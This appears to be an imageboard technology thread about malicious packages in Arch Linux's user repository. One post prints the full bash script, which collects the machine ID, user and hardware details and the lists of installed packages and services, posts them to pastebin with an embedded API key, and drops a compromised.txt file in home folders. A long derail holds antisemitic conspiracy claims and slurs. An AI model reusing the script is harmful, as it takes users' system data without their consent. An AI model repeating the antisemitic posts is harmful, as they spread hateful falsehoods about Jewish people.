[ / / / / / / / / / / / / / ] [ dir / 3rdpos / arepa / di / fast / general / recreo / tacos / vg ][Options][ watchlist ]

/tech/ - Technology

You can now write text to your AI-generated image at https://aiproto.com It is currently free to use for Proto members.
Email
Comment *
File
Select/drop/paste files here
Password (Randomized for file and post deletion; you may also set your own.)
* = required field[▶ Show post options & limits]
Confused? See the FAQ.
Expand all images

File (hide): c4b505103412099⋯.png (66.82 KB, 1465x1007, 1465:1007, af-1.png) (h) (u)

[–]

 No.942307>>942333 >>942447 >>942453 >>942488 >>945004 [Watch Thread][Show All Posts]

Archfags BTFO again

https://archive.fo/yeSaS

 No.942313>>942318

I have used Arch for several years and have never used AUR. I remain unBTFO. Sorry to disappoint.


 No.942318>>942334

>>942313

I used Arch back in 2010 or so. I don't remember exactly now but they had a big file system change when I was on vacation for a week and when I updated my system it got trashed.

Switched to Gentoo and was okay until last year when my 4 different versions of Python have lead to being unable to do most things with portage...


 No.942323

Old news. These three compromised packages, allegedly linked to cryptomining shit, were quickly removed.

AUR is similar to the Jewgle Play Store because of:

>DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.


 No.942326>>942488

>installing packages of random people somehow lands you with cryptominers

Who would have thonk?

I'm on ubuntu though, not into memes.


 No.942333>>942862

>>942307 (OP)

>"The security investigation shows that shows that a malicious user with the nick name xeactor modified in June 7 an orphaned package (software without an active maintainer) called acroread. The changes included a curl script that downloads and runs a script from a remote site. This installs a persistent software that reconfigures (((systemd))) in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner."


 No.942334>>942849

>>942318

I think I was on a *buntu variant at the time, so I didn't experience that. I've run Gentoo at various times in the past and have also run into portage flakeouts.

Eventually, I came to realize that what the mutt devs said about email clients is true about all software. All software sucks; some just sucks less. It all sucks in different ways and to different degrees, but it all sucks.

Yeah, AUR sucks. At one time, a Debian fuckup resulted in a huge % of the world's RSA keys being trivially breakable. Ubuntu spied on its users. The Mint download servers were compromised and were serving malicious downloads. OpenBSD had an FBI plant working on their IPSec implementation (whoops). Then there's the shit sandwiches that are Windows and Mac OS. Too many layers to count.

All software sucks.

Some people installing AUR packages from random xX1337k0|)3RXx got pwned? Yawn.


 No.942337

>AUR

Aka the excuse for having tiny as fuck repos. Arch is shit and has always been.


 No.942360

ITT: Nobody has read the scripts

It's a shitty systemd timer script that pastebins your system info. They didn't get anyone.


 No.942364>>942418 >>942442

Does it even work? What does $uploader do here, shouldn't it be upload?


#!/bin/bash

function urle() {
sed -e 's|!|%21|' -e 's|#|%23|' -e 's|$|%24|' -e 's|&|%26|' -e "s|'|%27|" -e 's|(|%28|' -e 's|)|%29|' -e 's|*|%2a|' -e 's|+|%2b|' -e 's|,|%2c|' -e 's|/|%2f|' -e 's|:|%3a|' -e 's|;|%3b|' -e 's|=|%3d|' -e 's|?|%3f|' -e 's|@|%40|' -e 's|\[|%5b|' -e 's|]|%5d|'
}
declare -fx urle
GID=
MACHINE_ID="$(cat /etc/machine-id)"
PASTE_TITLE="$(echo [xeactor]\ $MACHINE_ID|urle)"
upload() {
up_data="$(echo $1|urle)"
if [[ "$HTTP_CLIENT" == "curl" ]]; then
prefix='curl -s --data'
elif [[ "$HTTP_CLIENT" == "wget" ]]; then
prefix='wget -O/dev/null -q --post-data'
fi
$prefix "api_dev_key=42ba93112cc9677382e55e5e387eafa1&api_paste_private=0&api_paste_name=${PASTE_TITLE}&api_option=paste&api_paste_code=$up_data" "https://pastebin.com/api/api_post.php" >/dev/null 2>&1
}
if which wget >/dev/null 2>&1; then
export HTTP_CLIENT=wget
elif which curl >/dev/null 2>&1; then
export HTTP_CLIENT=curl
else
exit 0
fi
cmd_log() { echo "[cmd] \`$@\`:"; "$@" 2>&1; echo; }
full_log() {
echo ${MACHINE_ID}
cmd_log date '+%s'
cmd_log uname -a
cmd_log id
cmd_log lscpu
cmd_log pacman -Qeq
cmd_log pacman -Qdq
cmd_log systemctl list-units
}
FULL_LOG="$(full_log)"
$uploader "$FULL_LOG"
for x in /root /home/*; do
if [[ -w "$x/compromised.txt" ]]; then
echo "$FULL_LOG" > "$x/compromised.txt"
fi
done
exit 0


 No.942389

>random package nobody uses gets compromised

>people notice and it gets fixed

Lol archfags bfto, good thing we dont use that huh /g?


 No.942418

>>942364

So it uploads your system info to pastebin and drops a copy titled compromised.txt into every folder to spook you? Do you join a botnet and mine bitcoin too, or is that it? Just curious. I'm glad I don't use Arch, but I can't say I'm not already fucked since I still don't audit every line of code or even compile from source most of the time.


 No.942442

>>942364

Yeah $uploader is wrong.


 No.942447>>942453

>>942307 (OP)

I've used AUR twice, I think. The one thing I remember, though, is all of the flashing red text in yaourt saying

warning: potentially dangerous!

Because they aren't in the official repos and are, therefore, dangerous. People using the AUR should absolutely be careful and they have been informed. This isn't arch or their fault.


 No.942453

File (hide): 3c2d258d1410ab3⋯.png (249.41 KB, 1080x1510, 108:151, Screenshot_20180714-115820….png) (h) (u)

>>942307 (OP)

>>942447

It literally says this in the first words of the article.


 No.942488

>>942307 (OP)

>there was a thread about it two days ago

>community mantained packages

>get rekt by being a faggot

but mainly

>using arch in the first place

<cucked wiki

<systemd

<shit kiddos pretending to be hackers

<not minimalistic

<forks are shit

<lol installation is hard lol im faggot *atavistic emote eating shit*

>>942326

>ubuntu

>not into memes

simple dot wikipedia dot org


 No.942524>>942670 >>942788 >>946816

Linux is malware by definition. Stop using kike trash and use a real OS.


 No.942670>>942703 >>942788 >>946819

>>942524

You sound like my boomer dad who has been jedi mindtricked into thinking capitalism is communism and vice versa please save me from my slav predicament.


 No.942703>>942709 >>942711 >>942788 >>946807 >>946819

>>942670

Capitalism and Communism are both Jewish. Accept the third position.


 No.942709>>942764 >>942774 >>942788

>>942703

>jewish, therefore cant be good

You should try to judge people by who they are, not being assfag thinking there exists some evil cabala trying to shit the world and people for three thousand years. Yes, you can explain everything with "muh jews", everything is "grander scheme" and everything I do or others do is jewish because I think so. You think of them as if jews were god(s) and nobody can have a will independent of muh jews.

I would laugh if you werent that much of a nigger.


 No.942711>>942788 >>946819

>>942703

>Accept the third position

<The term "Third Position" was coined in Europe and the main precursors of Third Position politics were National Bolshevism

Stopped reading right there. Fuck off kike


 No.942756

Yeah, despite it's occasional good points Arch is a real fucking pain in the ass.

I might just give up and switch my linux box back to *buntu. It's shit too, but at least it mostly works ok.


 No.942764>>942788

>>942709

>You should try to judge people by who they are

A group of rats that has been wrecking havoc in the world for a few thousand years.

>Yes, you can explain everything with "muh jews", everything is "grander scheme" and everything I do or others do is jewish because I think so.

"Everything" is jewish because anything else is destroyed ruthlessly; that's the concept of controlling both sides (and always two sides) to give an illusion of freedom.

Mate, it's okay to be ignorant, but rolling in it like it's something to be proud of is pretty low. Jews are indeed responsible (directly and indirectly) for almost every problem these days; except Western decadence. They're just surfing on it and bolstering it to exterminate Europeans.

>You think of them as if jews were god(s)

Like I said, they're just using our decadence. And you don't need to be strong to take the lollipop of a kid, just mean. That's exactly why Jews can do what they do, they exploit the empathy of other nations to trick them into killing themselves.

They've consolidated their positions for a few hundred years in Europe and the US; their control of the pleb is indeed near godlike, right now.

>and nobody can have a will independent of muh jews.

Certainly not retards like you.

Different anon, by the way.


 No.942774>>942788 >>942826 >>942839

>>942709

Back to r/the_don with you


 No.942788

>>942524

>>942670

>>942703

>>942709

>>942711

>>942764

>>942774

keep /pol/ in /pol/ you mongoloids. you will convince anybody if you derail thread after thread, annoying the shit out of everybody.

>inb4 cripplechan is /pol/

back to reddit


 No.942826

>>942774

pretty sure that's JIDF central these days.


 No.942839>>942897

>>942774

What is "r/the_don"? What does the "r/" means?


 No.942849>>942858 >>946843

>>942334

>All software sucks.

(((LISP OS when?)))


 No.942858>>946810


 No.942862

>>942333

so if a package is orphaned, everybody can edit them without any limits, is that correct?


 No.942897

>>942839

I think it's from the website he came from and he let it slip.


 No.945004

>>942307 (OP)

>someone writes a script and uploads it on the third party, unofficial repository that you are warned about potentially being insecure before using

>HAHAHAHAHA BTFO


 No.946807

>>942703

>Capitalism is Jewish

I didn't know Scot are Jews


 No.946810


 No.946816

>>942524

>use a real OS

Like?


 No.946819>>946830

>>942670

>>942703

capitalism and communism are different side of the same shekel. In one system you're fucked in the ass by corporations in the other by the government, both run by kikes.

>>942711

third position is national socialism, where did you get Bolsheviks from ? lol


 No.946830

>>946819

You believe that national socialism isn't run by kikes? Fuck off kike.


 No.946843

>>942849

Every time anyone attempts a LISP OS it fails horribly because LISP is actually a shitty family.


 No.946909

File (hide): 25248a53ca8c858⋯.jpg (74.16 KB, 720x540, 4:3, absolutely disgusting.jpg) (h) (u)

>all those systemd distros




[Return][Go to top][Catalog][Screencap][Nerve Center][Cancer][Update] ( Scroll to new posts) ( Auto) 5
38 replies | 4 images | Page ?
[Post a Reply]
[ / / / / / / / / / / / / / ] [ dir / 3rdpos / arepa / di / fast / general / recreo / tacos / vg ][ watchlist ]